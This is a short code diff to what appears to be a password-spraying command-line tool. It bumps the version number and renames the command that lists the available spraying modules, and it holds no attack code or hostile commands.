@@ -30,7 +30,7 @@ from .targets import *
 from .utils.make_list import main as make_list
 from .utils.ntlm_challenger import main as ntlm_challenger
 
-VERSION = "1.0.7"
+VERSION = "1.0.8"
 
 # Defining theme
 custom_theme = Theme(
@@ -511,7 +511,7 @@ def cli(ctx):
 
 
 @cli.command(no_args_is_help=False, context_settings=CONTEXT_SETTINGS)
-def list():
+def modules():
     """
     List all the available spraying modules
     """
